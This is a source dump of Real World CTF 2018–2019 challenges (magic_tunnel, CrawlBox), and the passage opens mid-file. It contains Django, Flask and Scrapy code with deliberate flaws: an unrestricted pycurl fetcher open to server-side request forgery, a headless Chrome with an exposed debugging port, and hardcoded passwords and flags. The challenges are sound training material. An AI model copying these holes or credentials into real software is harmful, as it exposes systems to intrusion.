allow_redirects=True) 18 | 19 | # print(response.text) 20 | 21 | 22 | g = re.search(' 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Your Online Photo Album 12 | 13 | 14 | 15 |
16 |
17 |
18 |

Your Online Photo Album

19 |
20 |
21 | 22 |
23 |
24 |
25 |
26 | 27 |
28 | 29 |
30 | {% csrf_token %} 31 |
32 |
33 |
34 |
35 | 36 |
37 | {% for img in imgs %} 38 |
39 | 40 |
41 | {% endfor %} 42 |
43 |
44 | 45 | 46 | 47 | 48 | 49 | 50 | 51 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/urls.py: -------------------------------------------------------------------------------- 1 | from django.urls import path 2 | from django.conf import settings 3 | from django.contrib.staticfiles.views import static 4 | 5 | from . import views 6 | 7 | 8 | app_name = 'xremote' 9 | urlpatterns = [ 10 | path('', views.DownloadRemote.as_view(), name='download') 11 | ] 12 | 13 | if settings.DEBUG: 14 | urlpatterns += [ 15 | path('media/', static.serve, kwargs={'document_root': settings.MEDIA_ROOT}) 16 | ] 17 | -------------------------------------------------------------------------------- /2018/magic_tunnel/code/rwctf/xremote/views.py: -------------------------------------------------------------------------------- 1 | import os 2 | import pycurl 3 | import uuid 4 | 5 | from django.utils import dateformat, timezone 6 | from django.shortcuts import render 7 | from django.views import generic 8 | from django.db import transaction 9 | from django.urls import reverse_lazy 10 | from django.conf import settings 11 | from django.http import HttpResponseRedirect 12 | 13 | from . import forms 14 | from . import models 15 | 16 | 17 | class ImgsMixin(object): 18 | def get_context_data(self, **kwargs): 19 | kwargs['imgs'] = self.request.session.get('imgs', []) 20 | 21 | return super().get_context_data(**kwargs) 22 | 23 | 24 | class DownloadRemote(ImgsMixin, generic.FormView): 25 | form_class = forms.ImageForm 26 | template_name = 'index.html' 27 | success_url = reverse_lazy('xremote:download') 28 | 29 | def download(self, url): 30 | try: 31 | c = pycurl.Curl() 32 | 33 | c.setopt(pycurl.URL, url) 34 | c.setopt(pycurl.TIMEOUT, 10) 35 | 36 | response = c.perform_rb() 37 | 38 | c.close() 39 | except pycurl.error: 40 | response = b'' 41 | 42 | return response 43 | 44 | def generate_path(self): 45 | path = os.path.join(settings.MEDIA_ROOT, dateformat.format(timezone.now(), 'Y/m/d')) 46 | 47 | if not os.path.exists(path): 48 | os.makedirs(path, 0o755) 49 | return os.path.join(path, str(uuid.uuid4())) 50 | 51 | @transaction.atomic 52 | def form_valid(self, form): 53 | url = form.cleaned_data['url'] 54 | response = self.download(url) 55 | path = self.generate_path() 56 | 57 | if response: 58 | with open(path, 'wb') as f: 59 | f.write(response) 60 | 61 | url = path[len(settings.MEDIA_ROOT)+1:] 62 | models.Image.objects.create(path=url) 63 | if 'imgs' not in self.request.session: 64 | self.request.session['imgs'] = [] 65 | self.request.session['imgs'].append(url) 66 | 67 | self.request.session.modified = True 68 | 69 | return HttpResponseRedirect(self.get_success_url()) 70 | -------------------------------------------------------------------------------- /2018/magic_tunnel/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | services: 3 | web: 4 | build: . 
5 | volumes: 6 | - ./files/static:/usr/src/rwctf/static 7 | - ./files/media:/usr/src/rwctf/media 8 | environment: 9 | - DEBUG=false 10 | - SECRET_KEY=q9FPF3XBb9Bru5tF5yG8K2kGNq7Uf7Ng39wG 11 | - LOG_PATH=/tmp/error.log 12 | - "DATABASE_URL=postgres://postgres:DNBe42SxW6rb@db:5432/rwctf" 13 | depends_on: 14 | - db 15 | nginx: 16 | image: nginx:1-alpine 17 | volumes: 18 | - ./nginx/rwctf.conf:/etc/nginx/conf.d/rwctf.conf 19 | - ./files:/data 20 | ports: 21 | - "8080:8080" 22 | depends_on: 23 | - web 24 | db: 25 | image: postgres:10-alpine 26 | environment: 27 | - POSTGRES_PASSWORD=DNBe42SxW6rb 28 | - POSTGRES_DB=rwctf 29 | -------------------------------------------------------------------------------- /2018/magic_tunnel/files/media/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/magic_tunnel/files/media/.gitkeep -------------------------------------------------------------------------------- /2018/magic_tunnel/files/static/.gitkeep: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2018/magic_tunnel/files/static/.gitkeep -------------------------------------------------------------------------------- /2018/magic_tunnel/flag/flag: -------------------------------------------------------------------------------- 1 | rwctf{How_1_sample@SSRF!cha11enge} -------------------------------------------------------------------------------- /2018/magic_tunnel/flag/readflag.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | int main () { 4 | FILE *fp; 5 | char buff[255]; 6 | 7 | fp = fopen("/flag", "r"); 8 | fgets(buff, 255, fp); 9 | fclose(fp); 10 | 11 | printf("flag: %s\n", buff); 12 | 13 | return 0; 14 | } -------------------------------------------------------------------------------- /2018/magic_tunnel/nginx/rwctf.conf: -------------------------------------------------------------------------------- 1 | upstream django { 2 | # server unix:///path/to/your/mysite/mysite.sock; # for a file socket 3 | server web:8000; # for a web port socket (we'll use this first) 4 | } 5 | 6 | # configuration of the server 7 | server { 8 | # the port your site will be served on 9 | listen 8080; 10 | # the domain name it will serve for 11 | server_name localhost; # substitute your machine's IP address or FQDN 12 | charset utf-8; 13 | 14 | # max upload size 15 | client_max_body_size 2M; # adjust to taste 16 | 17 | # Django media 18 | location /media/ { 19 | alias /data/media/; # your Django project's media files - amend as required 20 | } 21 | 22 | location /static/ { 23 | alias /data/static/; # your Django project's static files - amend as required 24 | } 25 | 26 | # Finally, send all non-media requests to the Django server. 
27 | location / { 28 | uwsgi_pass django; 29 | include /etc/nginx/uwsgi_params; # the uwsgi_params file you installed 30 | } 31 | } -------------------------------------------------------------------------------- /2018/magic_tunnel/requirements.txt: -------------------------------------------------------------------------------- 1 | Django 2 | pycurl 3 | pytz 4 | uwsgi 5 | dj-database-url 6 | psycopg2 -------------------------------------------------------------------------------- /2019/crawlbox/.gitignore: -------------------------------------------------------------------------------- 1 | /scrapyd/ 2 | /env/ 3 | *.egg-info 4 | build/ 5 | *.egg 6 | *.pyc 7 | __pycache__ 8 | /.idea/ -------------------------------------------------------------------------------- /2019/crawlbox/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM phusion/baseimage:master 2 | 3 | LABEL maintainer="phith0n " 4 | 5 | RUN set -ex \ 6 | && apt-get update \ 7 | && apt-get install -y --no-install-recommends python3 python3-distutils gdebi-core wget curl ca-certificates xz-utils unzip wait-for-it \ 8 | && cd /tmp \ 9 | && wget -q https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb \ 10 | && gdebi -n google-chrome-stable_current_amd64.deb \ 11 | && rm -rf /tmp/google-chrome-stable_current_amd64.deb /var/lib/apt/lists/* 12 | 13 | RUN set -ex \ 14 | && curl -s https://bootstrap.pypa.io/get-pip.py | python3 \ 15 | && pip install -U flask scrapy selenium scrapyd scrapyd-client gunicorn gevent validators redis requests pyppeteer \ 16 | && mkdir -p /etc/service/scrapyd /etc/service/chromedriver /etc/service/flask /opt/scrapyd 17 | 18 | ADD docker/scrapyd.conf /opt/scrapyd/scrapyd.conf 19 | ADD docker/scrapyd.sh /etc/service/scrapyd/run 20 | ADD docker/chromedriver.sh /etc/service/chromedriver/run 21 | ADD docker/flask.sh /etc/service/flask/run 22 | 23 | RUN set -ex \ 24 | && chmod +x /etc/service/scrapyd/run /etc/service/chromedriver/run /etc/service/flask/run \ 25 | && groupadd chrome \ 26 | && useradd chrome -d /home/chrome -m -g chrome -s /bin/bash \ 27 | && groupadd scrapy \ 28 | && useradd scrapy -M -s /sbin/nologin -g scrapy \ 29 | && mkdir -p /opt/scrapyd/dbs /opt/scrapyd/eggs \ 30 | && chown scrapy:scrapy -R /opt/scrapyd 31 | 32 | EXPOSE 8001 33 | ADD docker/flag_uBd20U0zp1uk / 34 | -------------------------------------------------------------------------------- /2019/crawlbox/README.md: -------------------------------------------------------------------------------- 1 | # Real World CTF 2019 Quals - CrawlBox 2 | 3 | This is my first challenge for the Real World CTF 2019. 4 | -------------------------------------------------------------------------------- /2019/crawlbox/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '2.4' 2 | services: 3 | web: 4 | build: . 
5 | depends_on: 6 | - redis 7 | volumes: 8 | - ./web:/usr/src/web 9 | - ./webpage:/usr/src/webpage 10 | - ./docker/control.py:/opt/control.py 11 | cap_add: 12 | - SYS_ADMIN 13 | restart: always 14 | # cpus: '1.2' 15 | # mem_limit: 5G 16 | redis: 17 | image: redis:alpine 18 | command: redis-server /usr/local/etc/redis/redis.conf 19 | volumes: 20 | - ./docker/redis.conf:/usr/local/etc/redis/redis.conf 21 | restart: always 22 | nginx: 23 | image: nginx:alpine 24 | ports: 25 | - "45818:80" 26 | volumes: 27 | - ./docker/nginx-www.conf:/etc/nginx/conf.d/default.conf 28 | depends_on: 29 | - web 30 | restart: always 31 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/chromedriver.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | setuser chrome google-chrome --remote-debugging-port=21218 \ 4 | --disable-background-networking --disable-background-timer-throttling --disable-breakpad \ 5 | --disable-browser-side-navigation --disable-client-side-phishing-detection --disable-default-apps \ 6 | --disable-dev-shm-usage --disable-extensions --disable-features=site-per-process --disable-hang-monitor \ 7 | --disable-popup-blocking --disable-prompt-on-repost --disable-sync --disable-translate --metrics-recording-only \ 8 | --no-first-run --safebrowsing-disable-auto-update --enable-automation --password-store=basic \ 9 | --use-mock-keychain --headless --hide-scrollbars --mute-audio --disable-gpu \ 10 | --user-agent="Scrapy/ChromeHeadless (+https://scrapy.org)" 11 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/control.py: -------------------------------------------------------------------------------- 1 | import asyncio 2 | import argparse 3 | import requests 4 | from pyppeteer import connect 5 | from pyppeteer.browser import Browser 6 | from pyppeteer.page import Page 7 | 8 | loop = asyncio.get_event_loop() 9 | base = 'http://127.0.0.1:21218' 10 | data = requests.get(f'{base}/json/version').json() 11 | 12 | browser: Browser = loop.run_until_complete(connect(browserWSEndpoint=data['webSocketDebuggerUrl'], logLevel='WARNING')) 13 | 14 | 15 | async def show_tabs_command(): 16 | for tab in await browser.pages(): 17 | print('%r, %r' % (tab.url, await tab.title())) 18 | 19 | 20 | async def page_source_command(): 21 | for tab in await browser.pages(): 22 | print('%r' % tab.url) 23 | print('%r' % await tab.content()) 24 | print('\n==============================\n') 25 | 26 | 27 | async def main(): 28 | parser = argparse.ArgumentParser(description='Control RWCTF Crawlbox Game.') 29 | subcommands = parser.add_subparsers(dest='command_name') 30 | subcommands.add_parser('show_tabs') 31 | subcommands.add_parser('page_source') 32 | kwargs = parser.parse_args() 33 | 34 | if getattr(kwargs, 'command_name', ''): 35 | func = getattr(kwargs, 'command_name') + '_command' 36 | await globals()[func]() 37 | 38 | await browser.disconnect() 39 | 40 | 41 | if __name__ == '__main__': 42 | loop.run_until_complete(main()) 43 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/flag_uBd20U0zp1uk: -------------------------------------------------------------------------------- 1 | rwctf{97053f58121d36499788117b60472e9c} -------------------------------------------------------------------------------- /2019/crawlbox/docker/flask.sh: -------------------------------------------------------------------------------- 1 
| #!/usr/bin/env bash 2 | 3 | wait-for-it 127.0.0.1:6800 -- echo "scrapyd is up" 4 | if [[ $(curl -s http://127.0.0.1:6800/listprojects.json | grep "webpage") == "" ]]; then 5 | cd /usr/src/webpage 6 | scrapyd-deploy webpage -p webpage_1o24 7 | fi 8 | 9 | cd /usr/src/web 10 | gunicorn app:app --chdir=/usr/src/web -w 4 -k gevent -u nobody -g nogroup -b 0.0.0.0:8001 11 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/nginx-www.conf: -------------------------------------------------------------------------------- 1 | server { 2 | listen 80; 3 | server_name localhost; 4 | root /usr/share/nginx/html; 5 | index index.html; 6 | charset utf-8; 7 | 8 | location / { 9 | proxy_pass http://web:8001; 10 | proxy_set_header Host $host:45818; 11 | proxy_set_header X-Forwarded-For $remote_addr; 12 | } 13 | 14 | location ~ /\. { 15 | deny all; 16 | } 17 | } -------------------------------------------------------------------------------- /2019/crawlbox/docker/redis.conf: -------------------------------------------------------------------------------- 1 | requirepass QzFs0WGD3koT 2 | rename-command CONFIG "" 3 | -------------------------------------------------------------------------------- /2019/crawlbox/docker/scrapyd.conf: -------------------------------------------------------------------------------- 1 | [scrapyd] 2 | eggs_dir = eggs 3 | logs_dir = logs 4 | items_dir = 5 | jobs_to_keep = 5 6 | dbs_dir = dbs 7 | max_proc = 0 8 | max_proc_per_cpu = 4 9 | finished_to_keep = 100 10 | poll_interval = 5.0 11 | bind_address = 127.0.0.1 12 | http_port = 6800 13 | debug = off 14 | runner = scrapyd.runner 15 | application = scrapyd.app.application 16 | launcher = scrapyd.launcher.Launcher 17 | webroot = scrapyd.website.Root 18 | 19 | [services] 20 | schedule.json = scrapyd.webservice.Schedule 21 | cancel.json = scrapyd.webservice.Cancel 22 | addversion.json = scrapyd.webservice.AddVersion 23 | listprojects.json = scrapyd.webservice.ListProjects 24 | listversions.json = scrapyd.webservice.ListVersions 25 | listspiders.json = scrapyd.webservice.ListSpiders 26 | delproject.json = scrapyd.webservice.DeleteProject 27 | delversion.json = scrapyd.webservice.DeleteVersion 28 | listjobs.json = scrapyd.webservice.ListJobs 29 | daemonstatus.json = scrapyd.webservice.DaemonStatus -------------------------------------------------------------------------------- /2019/crawlbox/docker/scrapyd.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env bash 2 | 3 | cd /opt/scrapyd 4 | scrapyd -u scrapy -g scrapy 5 | -------------------------------------------------------------------------------- /2019/crawlbox/requirements.txt: -------------------------------------------------------------------------------- 1 | flask 2 | scrapy 3 | selenium 4 | scrapyd 5 | scrapyd-client 6 | gunicorn 7 | gevent 8 | validators 9 | redis -------------------------------------------------------------------------------- /2019/crawlbox/web/app.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import flask 3 | import redis 4 | import validators 5 | import functools 6 | from flask import Flask, request 7 | from logging.config import dictConfig 8 | 9 | dictConfig({ 10 | 'version': 1, 11 | 'formatters': {'default': { 12 | 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s', 13 | }}, 14 | 'handlers': {'wsgi': { 15 | 'class': 'logging.StreamHandler', 16 | 'stream': 
'ext://flask.logging.wsgi_errors_stream', 17 | 'formatter': 'default' 18 | }}, 19 | 'root': { 20 | 'level': 'INFO', 21 | 'handlers': ['wsgi'] 22 | } 23 | }) 24 | app = Flask(__name__) 25 | app.secret_key = 'E%g5r%J7wE73' 26 | rdb = redis.from_url('redis://:QzFs0WGD3koT@redis:6379/0') 27 | base = 'http://127.0.0.1:6800' 28 | 29 | 30 | def get_ipaddress(request: flask.Request): 31 | return request.headers.get("x-forwarded-for", request.remote_addr) 32 | 33 | 34 | def check_throttle(func): 35 | @functools.wraps(func) 36 | def view(*args, **kwargs): 37 | ip_address = get_ipaddress(flask.request) 38 | if flask.request.method != 'POST': 39 | return func(*args, **kwargs) 40 | 41 | if rdb.get(ip_address) is None: 42 | rdb.set(ip_address, 1, ex=10) 43 | return func(*args, **kwargs) 44 | else: 45 | flask.flash('Your request is too frequent', 'warning') 46 | return flask.redirect(flask.url_for('index')) 47 | 48 | return view 49 | 50 | 51 | def get_links(base): 52 | links = rdb.smembers(base) 53 | return [link.decode() for link in links] 54 | 55 | 56 | @app.route('/', methods=['GET', 'POST']) 57 | @check_throttle 58 | def index(): 59 | if request.method != 'POST': 60 | url = flask.session.get('url', '') 61 | links = get_links(url) if url else set() 62 | return flask.render_template('index.html', links=links) 63 | 64 | url = request.form.get("url", "") 65 | if not validators.url(url, public=True): 66 | flask.flash('URL is error', 'danger') 67 | return flask.redirect(flask.url_for('index')) 68 | 69 | flask.session['url'] = url 70 | try: 71 | app.logger.info('crawl for %s', url) 72 | response = requests.post(f'{base}/schedule.json', data={ 73 | 'project': 'webpage_1o24', 74 | 'spider': 'page', 75 | 'url': url 76 | }) 77 | if response.status_code == 200: 78 | data = response.json() 79 | if data.get('status', '') == 'ok': 80 | flask.flash('Waiting for crawling then refreshing the page to get results...', 'success') 81 | return flask.redirect(flask.url_for('index')) 82 | except Exception as e: 83 | app.logger.warning('request %s/schedule.json failed, exception %s', base, str(e)) 84 | 85 | flask.flash('Crawling fail...', 'danger') 86 | return flask.redirect(flask.url_for('index')) 87 | 88 | 89 | if __name__ == '__main__': 90 | app.run() 91 | -------------------------------------------------------------------------------- /2019/crawlbox/web/templates/index.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | 10 | 11 | Crawl Box 12 | 13 | 14 |
15 | [markup stripped in extraction — only the surviving text and template logic are shown below]
17 | Use crawlbox to get all links from a page
22 | {% with messages = get_flashed_messages(with_categories=true) %}
23 | {% if messages %}
24 | {% for category, message in messages %}
25 |
26 | {% endfor %}
27 | {% endif %}
28 | {% endwith %}
[results table — header cells "#" and "Link"]
43 | {% for link in links %}
44 | {{ loop.index }}{{ link }}
45 | {% endfor %}
50 | 51 | 52 | 53 | 54 | 55 | 56 | 57 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/scrapy.cfg: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapy startproject 2 | # 3 | # For more information about the [deploy] section see: 4 | # https://scrapyd.readthedocs.io/en/latest/deploy.html 5 | 6 | [settings] 7 | default = webpage.settings 8 | 9 | [deploy:webpage] 10 | url = http://localhost:6800/ 11 | project = webpage_1o24 12 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/setup.py: -------------------------------------------------------------------------------- 1 | # Automatically created by: scrapyd-deploy 2 | from setuptools import setup, find_packages 3 | 4 | 5 | setup( 6 | name = 'project', 7 | version = '1.0', 8 | packages = find_packages(), 9 | entry_points = {'scrapy': ['settings = webpage.settings']}, 10 | ) 11 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/phith0n/realworldctf/6035cb32a773d28750fbadf2cdab6ac00feafa2c/2019/crawlbox/webpage/webpage/__init__.py -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/items.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your scraped items 4 | # 5 | # See documentation in: 6 | # https://docs.scrapy.org/en/latest/topics/items.html 7 | 8 | import scrapy 9 | 10 | 11 | class LinkItem(scrapy.Item): 12 | base = scrapy.Field() 13 | link = scrapy.Field() 14 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/middlewares.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define here the models for your spider middleware 4 | # 5 | # See documentation in: 6 | # https://docs.scrapy.org/en/latest/topics/spider-middleware.html 7 | 8 | import requests 9 | import asyncio 10 | from scrapy import signals 11 | from pyppeteer import connect 12 | from pyppeteer.page import Page 13 | from scrapy.http import Request, HtmlResponse 14 | 15 | 16 | DEFAULT_ARGS = [ 17 | '--disable-background-networking', 18 | '--disable-background-timer-throttling', 19 | '--disable-breakpad', 20 | '--disable-browser-side-navigation', 21 | '--disable-client-side-phishing-detection', 22 | '--disable-default-apps', 23 | '--disable-dev-shm-usage', 24 | '--disable-extensions', 25 | '--disable-features=site-per-process', 26 | '--disable-hang-monitor', 27 | '--disable-popup-blocking', 28 | '--disable-prompt-on-repost', 29 | '--disable-sync', 30 | '--disable-translate', 31 | '--metrics-recording-only', 32 | '--no-first-run', 33 | '--safebrowsing-disable-auto-update', 34 | '--enable-automation', 35 | '--password-store=basic', 36 | '--use-mock-keychain', 37 | '--headless', 38 | '--hide-scrollbars', 39 | '--mute-audio', 40 | '--no-sandbox', 41 | '--disable-gpu', 42 | ] 43 | loop = asyncio.get_event_loop() 44 | 45 | 46 | class WebpageSpiderMiddleware(object): 47 | # Not all methods need to be defined. If a method is not defined, 48 | # scrapy acts as if the spider middleware does not modify the 49 | # passed objects. 
50 | 51 | @classmethod 52 | def from_crawler(cls, crawler): 53 | # This method is used by Scrapy to create your spiders. 54 | s = cls() 55 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 56 | return s 57 | 58 | def process_spider_input(self, response, spider): 59 | # Called for each response that goes through the spider 60 | # middleware and into the spider. 61 | 62 | # Should return None or raise an exception. 63 | return None 64 | 65 | def process_spider_output(self, response, result, spider): 66 | # Called with the results returned from the Spider, after 67 | # it has processed the response. 68 | 69 | # Must return an iterable of Request, dict or Item objects. 70 | for i in result: 71 | yield i 72 | 73 | def process_spider_exception(self, response, exception, spider): 74 | # Called when a spider or process_spider_input() method 75 | # (from other spider middleware) raises an exception. 76 | 77 | # Should return either None or an iterable of Request, dict 78 | # or Item objects. 79 | pass 80 | 81 | def process_start_requests(self, start_requests, spider): 82 | # Called with the start requests of the spider, and works 83 | # similarly to the process_spider_output() method, except 84 | # that it doesn’t have a response associated. 85 | 86 | # Must return only requests (not items). 87 | for r in start_requests: 88 | yield r 89 | 90 | def spider_opened(self, spider): 91 | spider.logger.info('Spider opened: %s' % spider.name) 92 | 93 | 94 | class BrowserMiddleware(object): 95 | def __init__(self): 96 | # option = webdriver.ChromeOptions() 97 | # for arg in DEFAULT_ARGS: 98 | # option.add_argument(arg) 99 | # self.browser = webdriver.Remote( 100 | # command_executor=ChromeRemoteConnection( 101 | # remote_server_addr='http://127.0.0.1:48192', 102 | # keep_alive=True 103 | # ), 104 | # desired_capabilities=option.to_capabilities() 105 | # ) 106 | base = 'http://127.0.0.1:21218' 107 | data = requests.get(f'{base}/json/version').json() 108 | 109 | self.browser = loop.run_until_complete(connect(browserWSEndpoint=data['webSocketDebuggerUrl'], logLevel='WARNING')) 110 | 111 | @classmethod 112 | def from_crawler(cls, crawler): 113 | # This method is used by Scrapy to create your spiders. 
114 | s = cls() 115 | crawler.signals.connect(s.spider_opened, signal=signals.spider_opened) 116 | crawler.signals.connect(s.spider_closed, signal=signals.spider_closed) 117 | return s 118 | 119 | async def request_url(self, url): 120 | page: Page = await self.browser.newPage() 121 | await page.goto(url) 122 | await asyncio.sleep(5) 123 | data = await page.content() 124 | await page.close() 125 | return data 126 | 127 | def process_request(self, request, spider): 128 | data = loop.run_until_complete(self.request_url(request.url)) 129 | 130 | return HtmlResponse(url=request.url, body=data.encode(), request=request, encoding='utf-8') 131 | 132 | def process_response(self, request, response, spider): 133 | return response 134 | 135 | def process_exception(self, request, exception, spider): 136 | pass 137 | 138 | def spider_opened(self, spider): 139 | spider.logger.info('Spider opened: %s' % spider.name) 140 | 141 | def spider_closed(self, spider, reason): 142 | spider.logger.info('Close browser') 143 | # self.browser.quit() 144 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/pipelines.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Define your item pipelines here 4 | # 5 | # Don't forget to add your pipeline to the ITEM_PIPELINES setting 6 | # See: https://docs.scrapy.org/en/latest/topics/item-pipeline.html 7 | import redis 8 | 9 | 10 | class WebpagePipeline(object): 11 | def __init__(self, redis_url): 12 | self.redis_url = redis_url 13 | 14 | @classmethod 15 | def from_crawler(cls, crawler): 16 | return cls(redis_url=crawler.settings.get('REDIS_URL')) 17 | 18 | def open_spider(self, spider): 19 | self.redis = redis.from_url(self.redis_url) 20 | 21 | def close_spider(self, spider): 22 | self.redis.close() 23 | 24 | def process_item(self, item, spider): 25 | self.redis.sadd(item['base'], item['link']) 26 | return item 27 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/settings.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | 3 | # Scrapy settings for webpage project 4 | # 5 | # For simplicity, this file contains only settings considered important or 6 | # commonly used. 
You can find more settings consulting the documentation: 7 | # 8 | # https://docs.scrapy.org/en/latest/topics/settings.html 9 | # https://docs.scrapy.org/en/latest/topics/downloader-middleware.html 10 | # https://docs.scrapy.org/en/latest/topics/spider-middleware.html 11 | 12 | BOT_NAME = 'webpage' 13 | 14 | SPIDER_MODULES = ['webpage.spiders'] 15 | NEWSPIDER_MODULE = 'webpage.spiders' 16 | 17 | 18 | # Crawl responsibly by identifying yourself (and your website) on the user-agent 19 | #USER_AGENT = 'webpage (+http://www.yourdomain.com)' 20 | 21 | # Obey robots.txt rules 22 | ROBOTSTXT_OBEY = False 23 | 24 | # Configure maximum concurrent requests performed by Scrapy (default: 16) 25 | #CONCURRENT_REQUESTS = 32 26 | 27 | # Configure a delay for requests for the same website (default: 0) 28 | # See https://docs.scrapy.org/en/latest/topics/settings.html#download-delay 29 | # See also autothrottle settings and docs 30 | #DOWNLOAD_DELAY = 3 31 | # The download delay setting will honor only one of: 32 | #CONCURRENT_REQUESTS_PER_DOMAIN = 16 33 | #CONCURRENT_REQUESTS_PER_IP = 16 34 | 35 | # Disable cookies (enabled by default) 36 | #COOKIES_ENABLED = False 37 | 38 | # Disable Telnet Console (enabled by default) 39 | #TELNETCONSOLE_ENABLED = False 40 | 41 | # Override the default request headers: 42 | #DEFAULT_REQUEST_HEADERS = { 43 | # 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', 44 | # 'Accept-Language': 'en', 45 | #} 46 | 47 | # Enable or disable spider middlewares 48 | # See https://docs.scrapy.org/en/latest/topics/spider-middleware.html 49 | #SPIDER_MIDDLEWARES = { 50 | # 'webpage.middlewares.WebpageSpiderMiddleware': 543, 51 | #} 52 | 53 | # Enable or disable downloader middlewares 54 | # See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html 55 | DOWNLOADER_MIDDLEWARES = { 56 | 'scrapy.downloadermiddlewares.robotstxt.RobotsTxtMiddleware': None, 57 | 'scrapy.downloadermiddlewares.ajaxcrawl.AjaxCrawlMiddleware': None, 58 | 'webpage.middlewares.BrowserMiddleware': 543, 59 | } 60 | 61 | DOWNLOAD_HANDLERS = { 62 | 'file': None, 63 | 's3': None, 64 | 'ftp': None, 65 | } 66 | 67 | # Enable or disable extensions 68 | # See https://docs.scrapy.org/en/latest/topics/extensions.html 69 | #EXTENSIONS = { 70 | # 'scrapy.extensions.telnet.TelnetConsole': None, 71 | #} 72 | 73 | # Configure item pipelines 74 | # See https://docs.scrapy.org/en/latest/topics/item-pipeline.html 75 | ITEM_PIPELINES = { 76 | 'webpage.pipelines.WebpagePipeline': 300, 77 | } 78 | 79 | # Enable and configure the AutoThrottle extension (disabled by default) 80 | # See https://docs.scrapy.org/en/latest/topics/autothrottle.html 81 | #AUTOTHROTTLE_ENABLED = True 82 | # The initial download delay 83 | #AUTOTHROTTLE_START_DELAY = 5 84 | # The maximum download delay to be set in case of high latencies 85 | #AUTOTHROTTLE_MAX_DELAY = 60 86 | # The average number of requests Scrapy should be sending in parallel to 87 | # each remote server 88 | #AUTOTHROTTLE_TARGET_CONCURRENCY = 1.0 89 | # Enable showing throttling stats for every response received: 90 | #AUTOTHROTTLE_DEBUG = False 91 | 92 | # Enable and configure HTTP caching (disabled by default) 93 | # See https://docs.scrapy.org/en/latest/topics/downloader-middleware.html#httpcache-middleware-settings 94 | #HTTPCACHE_ENABLED = True 95 | #HTTPCACHE_EXPIRATION_SECS = 0 96 | #HTTPCACHE_DIR = 'httpcache' 97 | #HTTPCACHE_IGNORE_HTTP_CODES = [] 98 | #HTTPCACHE_STORAGE = 'scrapy.extensions.httpcache.FilesystemCacheStorage' 99 | 100 | REDIS_URL = 
'redis://:QzFs0WGD3koT@redis:6379/0' 101 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/spiders/__init__.py: -------------------------------------------------------------------------------- 1 | # This package will contain the spiders of your Scrapy project 2 | # 3 | # Please refer to the documentation for information on how to create and manage 4 | # your spiders. 5 | -------------------------------------------------------------------------------- /2019/crawlbox/webpage/webpage/spiders/page.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | import scrapy 3 | from ..items import LinkItem 4 | 5 | 6 | class PageSpider(scrapy.Spider): 7 | name = 'page' 8 | 9 | def start_requests(self): 10 | url = getattr(self, 'url', 'http://example.com') 11 | 12 | yield scrapy.Request(url) 13 | 14 | def parse(self, response: scrapy.http.Response): 15 | for query in response.css('a'): 16 | if 'href' in query.attrib: 17 | yield LinkItem(base=response.url, link=query.attrib['href']) 18 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # My Real World CTF Challenges 2 | 3 | This is the source code for my Real World CTF challenges: 4 | 5 | - [Real World CTF 2018 Quals - Bookhub](2018/bookhub) 6 | - [Real World CTF 2018 Finals - Magic_Tunnel](2018/magic_tunnel) 7 | - [Real World CTF 2019 Quals - CrawlBox](2019/crawlbox) 8 | 9 | Just change into a challenge's directory and run `docker-compose up -d`. 10 | --------------------------------------------------------------------------------
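A minimal usage sketch of the `docker-compose up -d` workflow described in the README, using CrawlBox as the example (the `--build` flag, the `curl` check, and the log-following step are illustrative additions; host port 45818 comes from crawlbox's docker-compose.yml, and the other challenges expose their own ports):

    cd 2019/crawlbox
    docker-compose up -d --build     # build the web image and start the web, redis and nginx services
    docker-compose logs -f web       # follow the web container's output until it is ready
    curl -I http://127.0.0.1:45818/  # the challenge front page, served through nginx
    docker-compose down              # tear the environment down when finished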